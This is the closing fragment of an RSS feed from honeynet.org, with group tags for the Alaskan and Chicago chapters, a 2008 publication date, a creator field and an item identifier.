 <group domain="http://honeynet.org/chapters/alaska" xmlns="http://drupal.org/project/og">Alaskan  Chapter</group>
 <group domain="http://honeynet.org/chapters/chicago" xmlns="http://drupal.org/project/og">Chicago  Chapter</group>
 <pubDate>Sun, 10 Aug 2008 20:54:48 -0400</pubDate>
 <dc:creator>drupal</dc:creator>
 <guid isPermaLink="false">67 at http://honeynet.org</guid>
</item>
</channel>
</rss>
